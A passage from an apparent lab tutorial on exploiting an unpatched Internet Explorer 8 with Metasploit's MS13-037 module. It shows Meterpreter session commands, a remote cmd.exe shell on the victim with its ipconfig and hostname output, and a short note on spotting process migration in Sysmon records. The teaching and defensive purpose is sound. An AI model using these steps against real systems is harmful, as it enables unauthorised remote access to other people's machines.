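On a real host these records come from tasklist and netstat -ano, or from Sysmon process-creation and network-connection events, which also carry the parent image. Note that migrate can target any process the user owns; an attacker who migrates into explorer.exe or a browser tab process defeats the first rule, which is why the parent/child check is the one worth keeping.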
Back in Metasploit, let’s view our open Meterpreter sessions by typing sessions.
msf exploit(ms13_037_svg_dashstyle) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-FDN9DNVQ5IR\eric @ WIN-FDN9DNVQ5IR 10.0.1.10:4444 -> 10.0.1.11:49328 (10.0.1.11)
Now let’s interact with the session by typing sessions -i 1.
msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
As proof that we are in fact remotely connected to Victim, we can type shell to open a Windows command prompt (cmd.exe) and then type ipconfig to verify the IP address of Victim. We can see the IP address is 10.0.1.11. We can also type hostname to confirm that this is the same hostname we saw in our reconnaissance phase.
meterpreter > shell
Process 2936 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\eric\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::a0dd:5cb7:b23d:af11%11
IPv4 Address. . . . . . . . . . . : 10.0.1.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.1.1
Tunnel adapter isatap.austin.rr.com:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 13:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fd:3cfe:11c4:f5ff:fef4
Link-local IPv6 Address . . . . . : fe80::3cfe:11c4:f5ff:fef4%13
Default Gateway . . . . . . . . . : ::
Tunnel adapter isatap.{6657C62C-5DA5-4E0B-9C4A-2786A3F83F20}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\eric\Desktop>hostname
hostname
WIN-FDN9DNVQ5IR
So what have we accomplished so far? We used Metasploit to craft a malicious website that exploited a vulnerability in an unpatched Internet Explorer 8 on Windows 7 SP1. The exploit loaded a Meterpreter payload, which opened a session we used to remotely access Victim. Pretty cool, huh?
Hopefully, this will make you think twice about joining “free Wi-Fi” or clicking on suspicious links. It should also encourage you to keep your software up to date, especially your web browser: the fix for this bug shipped in MS13-037 in May 2013, and a patched IE8 would not have been exploitable by our page.
What’s Next
So far, we’ve seen how easy it is to exploit vulnerabilities and affirmed the importance of maintaining updated software. In the final part of this series, we’ll further explore Meterpreter and its capabilities including privilege escalation, data exfiltration, and maintaining persistence.